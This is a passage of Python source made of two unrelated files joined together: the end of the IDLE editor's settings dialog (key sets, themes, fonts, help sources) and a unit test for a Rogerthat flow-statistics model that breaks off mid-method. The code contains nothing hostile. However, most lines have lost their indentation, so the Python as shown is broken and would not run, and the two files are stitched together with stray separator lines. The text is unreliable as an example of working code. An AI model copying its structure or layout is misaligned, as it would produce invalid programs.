for event in keySetChanges.keys():
currentBindings[event]=keySetChanges[event].split()
currentKeySequences=currentBindings.values()
newKeys=GetKeysDialog(self,'Get New Keys',bindName,
currentKeySequences).result
if newKeys: #new keys were specified
if self.keysAreBuiltin.get(): #current key set is a built-in
message=('Your changes will be saved as a new Custom Key Set. '+
'Enter a name for your new Custom Key Set below.')
newKeySet=self.GetNewKeysName(message)
if not newKeySet: #user cancelled custom key set creation
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
return
else: #create new custom key set based on previously active key set
self.CreateNewKeySet(newKeySet)
self.listBindings.delete(listIndex)
self.listBindings.insert(listIndex,bindName+' - '+newKeys)
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
self.keyBinding.set(newKeys)
else:
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
def GetNewKeysName(self,message):
usedNames=(idleConf.GetSectionList('user','keys')+
idleConf.GetSectionList('default','keys'))
newKeySet=GetCfgSectionNameDialog(self,'New Custom Key Set',
message,usedNames).result
return newKeySet
def SaveAsNewKeySet(self):
newKeysName=self.GetNewKeysName('New Key Set Name:')
if newKeysName:
self.CreateNewKeySet(newKeysName)
def KeyBindingSelected(self,event):
self.buttonNewKeys.config(state=NORMAL)
def CreateNewKeySet(self,newKeySetName):
#creates new custom key set based on the previously active key set,
#and makes the new key set active
if self.keysAreBuiltin.get():
prevKeySetName=self.builtinKeys.get()
else:
prevKeySetName=self.customKeys.get()
prevKeys=idleConf.GetCoreKeys(prevKeySetName)
newKeys={}
for event in prevKeys.keys(): #add key set to changed items
eventName=event[2:-2] #trim off the angle brackets
binding=string.join(prevKeys[event])
newKeys[eventName]=binding
#handle any unsaved changes to prev key set
if prevKeySetName in self.changedItems['keys'].keys():
keySetChanges=self.changedItems['keys'][prevKeySetName]
for event in keySetChanges.keys():
newKeys[event]=keySetChanges[event]
        #save the new key set
self.SaveNewKeySet(newKeySetName,newKeys)
#change gui over to the new key set
customKeyList=idleConf.GetSectionList('user','keys')
customKeyList.sort()
self.optMenuKeysCustom.SetMenu(customKeyList,newKeySetName)
self.keysAreBuiltin.set(0)
self.SetKeysType()
def LoadKeysList(self,keySetName):
reselect=0
newKeySet=0
if self.listBindings.curselection():
reselect=1
listIndex=self.listBindings.index(ANCHOR)
keySet=idleConf.GetKeySet(keySetName)
bindNames=keySet.keys()
bindNames.sort()
self.listBindings.delete(0,END)
for bindName in bindNames:
key=string.join(keySet[bindName]) #make key(s) into a string
bindName=bindName[2:-2] #trim off the angle brackets
if keySetName in self.changedItems['keys'].keys():
#handle any unsaved changes to this key set
if bindName in self.changedItems['keys'][keySetName].keys():
key=self.changedItems['keys'][keySetName][bindName]
self.listBindings.insert(END, bindName+' - '+key)
if reselect:
self.listBindings.see(listIndex)
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
def DeleteCustomKeys(self):
keySetName=self.customKeys.get()
if not tkMessageBox.askyesno('Delete Key Set','Are you sure you wish '+
'to delete the key set %r ?' % (keySetName),
parent=self):
return
#remove key set from config
idleConf.userCfg['keys'].remove_section(keySetName)
if keySetName in self.changedItems['keys']:
del(self.changedItems['keys'][keySetName])
#write changes
idleConf.userCfg['keys'].Save()
#reload user key set list
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
if not itemList:
self.radioKeysCustom.config(state=DISABLED)
self.optMenuKeysCustom.SetMenu(itemList,'- no custom keys -')
else:
self.optMenuKeysCustom.SetMenu(itemList,itemList[0])
#revert to default key set
self.keysAreBuiltin.set(idleConf.defaultCfg['main'].Get('Keys','default'))
self.builtinKeys.set(idleConf.defaultCfg['main'].Get('Keys','name'))
#user can't back out of these changes, they must be applied now
self.Apply()
self.SetKeysType()
def DeleteCustomTheme(self):
themeName=self.customTheme.get()
if not tkMessageBox.askyesno('Delete Theme','Are you sure you wish '+
'to delete the theme %r ?' % (themeName,),
parent=self):
return
#remove theme from config
idleConf.userCfg['highlight'].remove_section(themeName)
if themeName in self.changedItems['highlight']:
del(self.changedItems['highlight'][themeName])
#write changes
idleConf.userCfg['highlight'].Save()
#reload user theme list
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
if not itemList:
self.radioThemeCustom.config(state=DISABLED)
self.optMenuThemeCustom.SetMenu(itemList,'- no custom themes -')
else:
self.optMenuThemeCustom.SetMenu(itemList,itemList[0])
#revert to default theme
self.themeIsBuiltin.set(idleConf.defaultCfg['main'].Get('Theme','default'))
self.builtinTheme.set(idleConf.defaultCfg['main'].Get('Theme','name'))
#user can't back out of these changes, they must be applied now
self.Apply()
self.SetThemeType()
def GetColour(self):
target=self.highlightTarget.get()
prevColour=self.frameColourSet.cget('bg')
rgbTuplet, colourString = tkColorChooser.askcolor(parent=self,
title='Pick new colour for : '+target,initialcolor=prevColour)
if colourString and (colourString!=prevColour):
#user didn't cancel, and they chose a new colour
if self.themeIsBuiltin.get(): #current theme is a built-in
message=('Your changes will be saved as a new Custom Theme. '+
                        'Enter a name for your new Custom Theme below.')
newTheme=self.GetNewThemeName(message)
if not newTheme: #user cancelled custom theme creation
return
else: #create new custom theme based on previously active theme
self.CreateNewTheme(newTheme)
self.colour.set(colourString)
else: #current theme is user defined
self.colour.set(colourString)
def OnNewColourSet(self):
newColour=self.colour.get()
self.frameColourSet.config(bg=newColour)#set sample
if self.fgHilite.get(): plane='foreground'
else: plane='background'
sampleElement=self.themeElements[self.highlightTarget.get()][0]
self.textHighlightSample.tag_config(sampleElement, **{plane:newColour})
theme=self.customTheme.get()
themeElement=sampleElement+'-'+plane
self.AddChangedItem('highlight',theme,themeElement,newColour)
def GetNewThemeName(self,message):
usedNames=(idleConf.GetSectionList('user','highlight')+
idleConf.GetSectionList('default','highlight'))
newTheme=GetCfgSectionNameDialog(self,'New Custom Theme',
message,usedNames).result
return newTheme
def SaveAsNewTheme(self):
        newThemeName=self.GetNewThemeName('New Theme Name:')
if newThemeName:
self.CreateNewTheme(newThemeName)
def CreateNewTheme(self,newThemeName):
#creates new custom theme based on the previously active theme,
#and makes the new theme active
if self.themeIsBuiltin.get():
themeType='default'
themeName=self.builtinTheme.get()
else:
themeType='user'
themeName=self.customTheme.get()
newTheme=idleConf.GetThemeDict(themeType,themeName)
#apply any of the old theme's unsaved changes to the new theme
if themeName in self.changedItems['highlight'].keys():
themeChanges=self.changedItems['highlight'][themeName]
for element in themeChanges.keys():
newTheme[element]=themeChanges[element]
#save the new theme
self.SaveNewTheme(newThemeName,newTheme)
#change gui over to the new theme
customThemeList=idleConf.GetSectionList('user','highlight')
customThemeList.sort()
self.optMenuThemeCustom.SetMenu(customThemeList,newThemeName)
self.themeIsBuiltin.set(0)
self.SetThemeType()
def OnListFontButtonRelease(self,event):
font = self.listFontName.get(ANCHOR)
self.fontName.set(font.lower())
self.SetFontSample()
def SetFontSample(self,event=None):
fontName=self.fontName.get()
if self.fontBold.get():
fontWeight=tkFont.BOLD
else:
fontWeight=tkFont.NORMAL
newFont = (fontName, self.fontSize.get(), fontWeight)
self.labelFontSample.config(font=newFont)
self.textHighlightSample.configure(font=newFont)
def SetHighlightTarget(self):
if self.highlightTarget.get()=='Cursor': #bg not possible
self.radioFg.config(state=DISABLED)
self.radioBg.config(state=DISABLED)
self.fgHilite.set(1)
else: #both fg and bg can be set
self.radioFg.config(state=NORMAL)
self.radioBg.config(state=NORMAL)
self.fgHilite.set(1)
self.SetColourSample()
def SetColourSampleBinding(self,*args):
self.SetColourSample()
def SetColourSample(self):
        #set the colour sample area
tag=self.themeElements[self.highlightTarget.get()][0]
if self.fgHilite.get(): plane='foreground'
else: plane='background'
colour=self.textHighlightSample.tag_cget(tag,plane)
self.frameColourSet.config(bg=colour)
def PaintThemeSample(self):
if self.themeIsBuiltin.get(): #a default theme
theme=self.builtinTheme.get()
else: #a user theme
theme=self.customTheme.get()
for elementTitle in self.themeElements.keys():
element=self.themeElements[elementTitle][0]
colours=idleConf.GetHighlight(theme,element)
if element=='cursor': #cursor sample needs special painting
colours['background']=idleConf.GetHighlight(theme,
'normal', fgBg='bg')
#handle any unsaved changes to this theme
if theme in self.changedItems['highlight'].keys():
themeDict=self.changedItems['highlight'][theme]
if element+'-foreground' in themeDict:
colours['foreground']=themeDict[element+'-foreground']
if element+'-background' in themeDict:
colours['background']=themeDict[element+'-background']
self.textHighlightSample.tag_config(element, **colours)
self.SetColourSample()
def HelpSourceSelected(self,event):
self.SetHelpListButtonStates()
def SetHelpListButtonStates(self):
if self.listHelp.size()<1: #no entries in list
self.buttonHelpListEdit.config(state=DISABLED)
self.buttonHelpListRemove.config(state=DISABLED)
else: #there are some entries
if self.listHelp.curselection(): #there currently is a selection
self.buttonHelpListEdit.config(state=NORMAL)
self.buttonHelpListRemove.config(state=NORMAL)
else: #there currently is not a selection
self.buttonHelpListEdit.config(state=DISABLED)
self.buttonHelpListRemove.config(state=DISABLED)
def HelpListItemAdd(self):
helpSource=GetHelpSourceDialog(self,'New Help Source').result
if helpSource:
self.userHelpList.append( (helpSource[0],helpSource[1]) )
self.listHelp.insert(END,helpSource[0])
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
def HelpListItemEdit(self):
itemIndex=self.listHelp.index(ANCHOR)
helpSource=self.userHelpList[itemIndex]
newHelpSource=GetHelpSourceDialog(self,'Edit Help Source',
menuItem=helpSource[0],filePath=helpSource[1]).result
if (not newHelpSource) or (newHelpSource==helpSource):
return #no changes
self.userHelpList[itemIndex]=newHelpSource
self.listHelp.delete(itemIndex)
self.listHelp.insert(itemIndex,newHelpSource[0])
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
def HelpListItemRemove(self):
itemIndex=self.listHelp.index(ANCHOR)
del(self.userHelpList[itemIndex])
self.listHelp.delete(itemIndex)
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
def UpdateUserHelpChangedItems(self):
"Clear and rebuild the HelpFiles section in self.changedItems"
self.changedItems['main']['HelpFiles'] = {}
for num in range(1,len(self.userHelpList)+1):
self.AddChangedItem('main','HelpFiles',str(num),
string.join(self.userHelpList[num-1][:2],';'))
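        #Illustrative example (not from the original source): with
        #self.userHelpList == [('Python Docs', 'https://docs.python.org')],
        #the rebuilt HelpFiles section would contain the single item
        #  1 = Python Docs;https://docs.python.org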
def LoadFontCfg(self):
##base editor font selection list
fonts=list(tkFont.families(self))
fonts.sort()
for font in fonts:
self.listFontName.insert(END,font)
configuredFont=idleConf.GetOption('main','EditorWindow','font',
default='courier')
lc_configuredFont = configuredFont.lower()
self.fontName.set(lc_configuredFont)
lc_fonts = [s.lower() for s in fonts]
if lc_configuredFont in lc_fonts:
currentFontIndex = lc_fonts.index(lc_configuredFont)
self.listFontName.see(currentFontIndex)
self.listFontName.select_set(currentFontIndex)
self.listFontName.select_anchor(currentFontIndex)
##font size dropdown
fontSize=idleConf.GetOption('main','EditorWindow','font-size',
type='int', default='10')
self.optMenuFontSize.SetMenu(('7','8','9','10','11','12','13','14',
'16','18','20','22'),fontSize )
##fontWeight
self.fontBold.set(idleConf.GetOption('main','EditorWindow',
'font-bold',default=0,type='bool'))
##font sample
self.SetFontSample()
def LoadTabCfg(self):
##indent sizes
spaceNum=idleConf.GetOption('main','Indent','num-spaces',
default=4,type='int')
self.spaceNum.set(spaceNum)
def LoadThemeCfg(self):
##current theme type radiobutton
self.themeIsBuiltin.set(idleConf.GetOption('main','Theme','default',
type='bool',default=1))
##currently set theme
currentOption=idleConf.CurrentTheme()
##load available theme option menus
if self.themeIsBuiltin.get(): #default theme selected
itemList=idleConf.GetSectionList('default','highlight')
itemList.sort()
self.optMenuThemeBuiltin.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
if not itemList:
self.radioThemeCustom.config(state=DISABLED)
self.customTheme.set('- no custom themes -')
else:
self.optMenuThemeCustom.SetMenu(itemList,itemList[0])
else: #user theme selected
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
self.optMenuThemeCustom.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('default','highlight')
itemList.sort()
self.optMenuThemeBuiltin.SetMenu(itemList,itemList[0])
self.SetThemeType()
##load theme element option menu
themeNames=self.themeElements.keys()
themeNames.sort(key=lambda x: self.themeElements[x][1])
self.optMenuHighlightTarget.SetMenu(themeNames,themeNames[0])
self.PaintThemeSample()
self.SetHighlightTarget()
def LoadKeyCfg(self):
##current keys type radiobutton
self.keysAreBuiltin.set(idleConf.GetOption('main','Keys','default',
type='bool',default=1))
##currently set keys
currentOption=idleConf.CurrentKeys()
##load available keyset option menus
if self.keysAreBuiltin.get(): #default theme selected
itemList=idleConf.GetSectionList('default','keys')
itemList.sort()
self.optMenuKeysBuiltin.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
if not itemList:
self.radioKeysCustom.config(state=DISABLED)
self.customKeys.set('- no custom keys -')
else:
self.optMenuKeysCustom.SetMenu(itemList,itemList[0])
else: #user key set selected
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
self.optMenuKeysCustom.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('default','keys')
itemList.sort()
self.optMenuKeysBuiltin.SetMenu(itemList,itemList[0])
self.SetKeysType()
##load keyset element list
keySetName=idleConf.CurrentKeys()
self.LoadKeysList(keySetName)
def LoadGeneralCfg(self):
#startup state
self.startupEdit.set(idleConf.GetOption('main','General',
'editor-on-startup',default=1,type='bool'))
#autosave state
self.autoSave.set(idleConf.GetOption('main', 'General', 'autosave',
default=0, type='bool'))
#initial window size
self.winWidth.set(idleConf.GetOption('main','EditorWindow','width',
type='int'))
self.winHeight.set(idleConf.GetOption('main','EditorWindow','height',
type='int'))
#initial paragraph reformat size
self.paraWidth.set(idleConf.GetOption('main','FormatParagraph','paragraph',
type='int'))
# default source encoding
self.encoding.set(idleConf.GetOption('main', 'EditorWindow',
'encoding', default='none'))
# additional help sources
self.userHelpList = idleConf.GetAllExtraHelpSourcesList()
for helpItem in self.userHelpList:
self.listHelp.insert(END,helpItem[0])
self.SetHelpListButtonStates()
def LoadConfigs(self):
"""
load configuration from default and user config files and populate
the widgets on the config dialog pages.
"""
### fonts / tabs page
self.LoadFontCfg()
self.LoadTabCfg()
### highlighting page
self.LoadThemeCfg()
### keys page
self.LoadKeyCfg()
### general page
self.LoadGeneralCfg()
def SaveNewKeySet(self,keySetName,keySet):
"""
save a newly created core key set.
keySetName - string, the name of the new key set
keySet - dictionary containing the new key set
"""
if not idleConf.userCfg['keys'].has_section(keySetName):
idleConf.userCfg['keys'].add_section(keySetName)
for event in keySet.keys():
value=keySet[event]
idleConf.userCfg['keys'].SetOption(keySetName,event,value)
def SaveNewTheme(self,themeName,theme):
"""
save a newly created theme.
themeName - string, the name of the new theme
theme - dictionary containing the new theme
"""
if not idleConf.userCfg['highlight'].has_section(themeName):
idleConf.userCfg['highlight'].add_section(themeName)
for element in theme.keys():
value=theme[element]
idleConf.userCfg['highlight'].SetOption(themeName,element,value)
def SetUserValue(self,configType,section,item,value):
if idleConf.defaultCfg[configType].has_option(section,item):
if idleConf.defaultCfg[configType].Get(section,item)==value:
#the setting equals a default setting, remove it from user cfg
return idleConf.userCfg[configType].RemoveOption(section,item)
#if we got here set the option
return idleConf.userCfg[configType].SetOption(section,item,value)
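    #Illustrative note (assumption, not from the original source): if the
    #default font-size is 10, SetUserValue('main','EditorWindow','font-size','10')
    #removes any user override, while a value of '12' is written to the user
    #config. RemoveOption/SetOption are assumed to report whether the user file
    #actually changed, which is what SaveAllChangedConfigs checks below.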
def SaveAllChangedConfigs(self):
"Save configuration changes to the user config file."
idleConf.userCfg['main'].Save()
for configType in self.changedItems.keys():
cfgTypeHasChanges = False
for section in self.changedItems[configType].keys():
if section == 'HelpFiles':
#this section gets completely replaced
idleConf.userCfg['main'].remove_section('HelpFiles')
cfgTypeHasChanges = True
for item in self.changedItems[configType][section].keys():
value = self.changedItems[configType][section][item]
if self.SetUserValue(configType,section,item,value):
cfgTypeHasChanges = True
if cfgTypeHasChanges:
idleConf.userCfg[configType].Save()
for configType in ['keys', 'highlight']:
# save these even if unchanged!
idleConf.userCfg[configType].Save()
self.ResetChangedItems() #clear the changed items dict
def DeactivateCurrentConfig(self):
#Before a config is saved, some cleanup of current
#config must be done - remove the previous keybindings
winInstances=self.parent.instance_dict.keys()
for instance in winInstances:
instance.RemoveKeybindings()
def ActivateConfigChanges(self):
"Dynamically apply configuration changes"
winInstances=self.parent.instance_dict.keys()
for instance in winInstances:
instance.ResetColorizer()
instance.ResetFont()
instance.set_notabs_indentwidth()
instance.ApplyKeybindings()
instance.reset_help_menu_entries()
def Cancel(self):
self.destroy()
def Ok(self):
self.Apply()
self.destroy()
def Apply(self):
self.DeactivateCurrentConfig()
self.SaveAllChangedConfigs()
self.ActivateConfigChanges()
def Help(self):
pass
if __name__ == '__main__':
#test the dialog
root=Tk()
Button(root,text='Dialog',
command=lambda:ConfigDialog(root,'Settings')).pack()
root.instance_dict={}
root.mainloop()
|
|
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
import datetime
import logging
import mc_unittest
from rogerthat.models import FlowStatistics
from rogerthat.rpc import users
from rogerthat.to.statistics import FlowStatisticsTO
from rogerthat.utils import now
SENT = FlowStatistics.STATUS_SENT
RCVD = FlowStatistics.STATUS_RECEIVED
READ = FlowStatistics.STATUS_READ
ACKED = FlowStatistics.STATUS_ACKED
class FlowStatisticsTestCase(mc_unittest.TestCase):
tag = u'GO'
service_identity_user = users.User(u'[email protected]/+default+')
def test_status_list_names(self):
stats = FlowStatistics(key=FlowStatistics.create_key(self.tag, self.service_identity_user))
stats.labels = list('012345')
self.assertEqual('step_0_read', stats._get_status_list_name(list(), '0', 'read'))
self.assertEqual('step_0_1_2_3_4_sent', stats._get_status_list_name(list('0123'), '4', 'sent'))
self.assertEqual('step_0_1_2_3_4_acked_5', stats._get_status_list_name(list('0123'), '4', 'acked', '5'))
def _create_stats(self):
# Flow used in this unit test:
#
# START
# |
# +-------+
# | id: A |
# +-------+
# _one_| |_two_
# | |
# +-------+ +-------+
# | id: B | | id: C |--------+
# +-------+ +-------+ |
# | |_negative_ | |
# positive | |_three_ |
# | | | |
# +-------+ | | |
# | id: D |---+------+-----+----+----+
# +-------+ |
# +-------+
# | id: E |---------- END
# +-------+
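        # The breadcrumbs list passed to stats.add() below appears to be the
        # path walked so far, as alternating step ids and button ids, e.g.
        # ['A', 'one', 'B', 'positive'] means step A answered with button 'one',
        # then step B answered with button 'positive'; None stands for the
        # default (rogerthat) button.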
stats = FlowStatistics(key=FlowStatistics.create_key(self.tag, self.service_identity_user))
stats.set_today()
# path: A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
stats.add([], 'A', SENT)
stats.add([], 'A', RCVD)
stats.add([], 'A', READ)
stats.add([], 'A', ACKED, 'one')
stats.add(['A', 'one'], 'B', SENT)
stats.add(['A', 'one'], 'B', RCVD)
stats.add(['A', 'one'], 'B', READ)
stats.add(['A', 'one'], 'B', ACKED, 'positive')
stats.add(['A', 'one', 'B', 'positive'], 'D', SENT)
stats.add(['A', 'one', 'B', 'positive'], 'D', RCVD)
stats.add(['A', 'one', 'B', 'positive'], 'D', READ)
stats.add(['A', 'one', 'B', 'positive'], 'D', ACKED, None)
stats.add(['A', 'one', 'B', 'positive', 'D', None], 'E', SENT)
stats.add(['A', 'one', 'B', 'positive', 'D', None], 'E', RCVD)
stats.add(['A', 'one', 'B', 'positive', 'D', None], 'E', READ)
stats.add(['A', 'one', 'B', 'positive', 'D', None], 'E', ACKED, None)
# path: A --one--> B (sent+rcvd+READ)
stats.add([], 'A', SENT)
stats.add([], 'A', RCVD)
stats.add([], 'A', READ)
stats.add([], 'A', ACKED, 'one')
stats.add(['A', 'one'], 'B', SENT)
stats.add(['A', 'one'], 'B', RCVD)
stats.add(['A', 'one'], 'B', READ)
# path: A --two--> C --rogerthat--> E -->rogerthat--> END
stats.add([], 'A', SENT)
stats.add([], 'A', RCVD)
stats.add([], 'A', READ)
stats.add([], 'A', ACKED, 'two')
stats.add(['A', 'two'], 'C', SENT)
stats.add(['A', 'two'], 'C', RCVD)
stats.add(['A', 'two'], 'C', READ)
stats.add(['A', 'two'], 'C', ACKED, None)
stats.add(['A', 'two', 'C', None], 'E', SENT)
stats.add(['A', 'two', 'C', None], 'E', RCVD)
stats.add(['A', 'two', 'C', None], 'E', READ)
stats.add(['A', 'two', 'C', None], 'E', ACKED, None)
# path: A --two--> C --three--> E (sent+RCVD)
stats.add([], 'A', SENT)
stats.add([], 'A', RCVD)
stats.add([], 'A', READ)
stats.add([], 'A', ACKED, 'two')
stats.add(['A', 'two'], 'C', SENT)
stats.add(['A', 'two'], 'C', RCVD)
stats.add(['A', 'two'], 'C', READ)
stats.add(['A', 'two'], 'C', ACKED, 'three')
stats.add(['A', 'two', 'C', 'three'], 'E', SENT)
stats.add(['A', 'two', 'C', 'three'], 'E', RCVD)
return stats
def test_stats_model(self):
stats = self._create_stats()
self.assertEqual(4, stats.step_0_sent[0])
self.assertEqual(4, stats.step_0_received[0])
self.assertEqual(4, stats.step_0_read[0])
self.assertEqual(4, stats.get_status_list([], 'A', SENT)[0])
self.assertEqual(4, stats.get_status_list([], 'A', RCVD)[0])
self.assertEqual(4, stats.get_status_list([], 'A', READ)[0])
self.assertEqual(2, stats.get_status_list([], 'A', ACKED, 'one')[0])
self.assertEqual(2, stats.get_status_list([], 'A', ACKED, 'two')[0])
self.assertEqual(2, stats.get_status_list(['A', 'one'], 'B', SENT)[0])
self.assertEqual(2, stats.get_status_list(['A', 'one'], 'B', RCVD)[0])
self.assertEqual(2, stats.get_status_list(['A', 'one'], 'B', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one'], 'B', ACKED, 'positive')[0])
self.assertEqual(0, stats.get_status_list(['A', 'one'], 'B', ACKED, 'negative')[0])
self.assertEqual(2, stats.get_status_list(['A', 'two'], 'C', SENT)[0])
self.assertEqual(2, stats.get_status_list(['A', 'two'], 'C', RCVD)[0])
self.assertEqual(2, stats.get_status_list(['A', 'two'], 'C', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two'], 'C', ACKED, 'three')[0])
self.assertEqual(1, stats.get_status_list(['A', 'two'], 'C', ACKED, None)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive'], 'D', SENT)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive'], 'D', RCVD)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive'], 'D', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive'], 'D', ACKED, None)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', None], 'E', SENT)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', None], 'E', RCVD)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', None], 'E', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', None], 'E', ACKED, None)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', 'three'], 'E', SENT)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', 'three'], 'E', RCVD)[0])
self.assertEqual(0, stats.get_status_list(['A', 'two', 'C', 'three'], 'E', READ)[0])
self.assertEqual(0, stats.get_status_list(['A', 'two', 'C', 'three'], 'E', ACKED, None)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive', 'D', None], 'E', SENT)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive', 'D', None], 'E', RCVD)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive', 'D', None], 'E', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive', 'D', None], 'E', ACKED, None)[0])
def test_stats_t_o_with_flows_only(self):
def count(day_stats):
return sum(s.count for s in day_stats)
stats = self._create_stats()
for days in (1, 7, 300): # should all return the same result
logging.info('Days: %s', days)
statsTO = FlowStatisticsTO.from_model(stats,
FlowStatisticsTO.VIEW_FLOWS,
days=days)
self.assertEqual(self.tag, statsTO.tag)
self.assertEqual(0, len(statsTO.steps))
self.assertEqual(1, len(statsTO.flows))
step_a = statsTO.flows[0]
# step_a paths:
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
# A --one--> B (sent+rcvd+READ)
# A --two--> C --rogerthat--> E -->rogerthat--> END
# A --two--> C --three--> E (sent+RCVD)
self.assertEqual('A', step_a.step_id)
self.assertTupleEqual((4, 4, 4),
(count(step_a.sent_count), count(step_a.received_count), count(step_a.read_count)))
self.assertEqual(2, len(step_a.buttons))
self.assertEqual(2, count(step_a.get_button('one').acked_count))
self.assertEqual(2, count(step_a.get_button('two').acked_count))
step_a_one_b = step_a.get_button('one').next_steps[0]
# step_a_one_b paths:
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
# A --one--> B (sent+rcvd+READ)
self.assertEqual('B', step_a_one_b.step_id)
self.assertTupleEqual((2, 2, 2), (count(step_a_one_b.sent_count),
count(step_a_one_b.received_count),
count(step_a_one_b.read_count)))
self.assertEqual(1, len(step_a_one_b.buttons))
self.assertEqual(1, count(step_a_one_b.get_button('positive').acked_count))
step_a_one_b_pos_d = step_a_one_b.get_button('positive').next_steps[0]
# step_a_one_b_pos_d paths:
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
self.assertEqual('D', step_a_one_b_pos_d.step_id)
self.assertTupleEqual((1, 1, 1), (count(step_a_one_b_pos_d.sent_count),
count(step_a_one_b_pos_d.received_count),
count(step_a_one_b_pos_d.read_count)))
self.assertEqual(1, len(step_a_one_b_pos_d.buttons))
self.assertEqual(1, count(step_a_one_b_pos_d.get_button(None).acked_count))
step_a_one_b_pos_d_rt_e = step_a_one_b_pos_d.get_button(None).next_steps[0]
# step_a_one_b_pos_d_rt_e paths:
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
self.assertEqual('E', step_a_one_b_pos_d_rt_e.step_id)
self.assertTupleEqual((1, 1, 1), (count(step_a_one_b_pos_d_rt_e.sent_count),
count(step_a_one_b_pos_d_rt_e.received_count),
count(step_a_one_b_pos_d_rt_e.read_count)))
self.assertEqual(1, len(step_a_one_b_pos_d_rt_e.buttons))
self.assertEqual(1, count(step_a_one_b_pos_d_rt_e.get_button(None).acked_count))
self.assertEqual(0, len(step_a_one_b_pos_d_rt_e.get_button(None).next_steps))
step_a_two_c = step_a.get_button('two').next_steps[0]
# step_a_two_c paths:
# A --two--> C --rogerthat--> E -->rogerthat--> END
# A --two--> C --three--> E (sent+RCVD)
self.assertEqual('C', step_a_two_c.step_id)
self.assertTupleEqual((2, 2, 2), (count(step_a_two_c.sent_count),
count(step_a_two_c.received_count),
count(step_a_two_c.read_count)))
self.assertEqual(2, len(step_a_two_c.buttons))
self.assertEqual(1, count(step_a_two_c.get_button(None).acked_count))
self.assertEqual(1, count(step_a_two_c.get_button('three').acked_count))
step_a_two_c_rt_e = step_a_two_c.get_button(None).next_steps[0]
# step_a_two_c_rt_e paths:
# A --two--> C --rogerthat--> E -->rogerthat--> END
self.assertEqual('E', step_a_two_c_rt_e.step_id)
self.assertTupleEqual((1, 1, 1), (count(step_a_two_c_rt_e.sent_count),
count(step_a_two_c_rt_e.received_count),
count(step_a_two_c_rt_e.read_count)))
self.assertEqual(1, len(step_a_two_c_rt_e.buttons))
self.assertEqual(1, count(step_a_two_c_rt_e.get_button(None).acked_count))
step_a_two_c_three_e = step_a_two_c.get_button('three').next_steps[0]
# step_a_two_c_three_e paths:
# A --two--> C --three--> E (sent+RCVD)
self.assertEqual('E', step_a_two_c_three_e.step_id)
self.assertTupleEqual((1, 1, 0), (count(step_a_two_c_three_e.sent_count),
count(step_a_two_c_three_e.received_count),
count(step_a_two_c_three_e.read_count)))
self.assertEqual(0, len(step_a_two_c_three_e.buttons))
def test_stats_t_o_with_steps_only(self):
def count(day_stats):
return sum(s.count for s in day_stats)
stats = self._create_stats()
for days in (1, 7, 300): # should all return the same result
logging.info('Days: %s', days)
statsTO = FlowStatisticsTO.from_model(stats,
FlowStatisticsTO.VIEW_STEPS,
days=days)
self.assertEqual(self.tag, statsTO.tag)
self.assertEqual(0, len(statsTO.flows))
self.assertEqual(5, len(statsTO.steps))
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
# A --one--> B (sent+rcvd+READ)
# A --two--> C --rogerthat--> E -->rogerthat--> END
# A --two--> C --three--> E (sent+RCVD)
# step A
step_a = statsTO.get_step('A')
self.assertEqual('A', step_a.step_id)
self.assertTupleEqual((4, 4, 4),
(count(step_a.sent_count), count(step_a.received_count), count(step_a.read_count)))
self.assertEqual(2, len(step_a.buttons))
self.assertEqual(2, count(step_a.get_button('one').acked_count))
self.assertEqual(2, count(step_a.get_button('two').acked_count))
# step B
step_b = statsTO.get_step('B')
self.assertTupleEqual((2, 2, 2),
(count(step_b.sent_count), count(step_b.received_count), count(step_b.read_count)))
self.assertEqual(1, len(step_b.buttons)) # only 'positive' is reached, no entry for 'negative'
self.assertEqual(1, count(step_b.get_button('positive').acked_count))
self.assertIsNone(step_b.get_button('negative'))
# step C
step_c = statsTO.get_step('C')
self.assertTupleEqual((2, 2, 2),
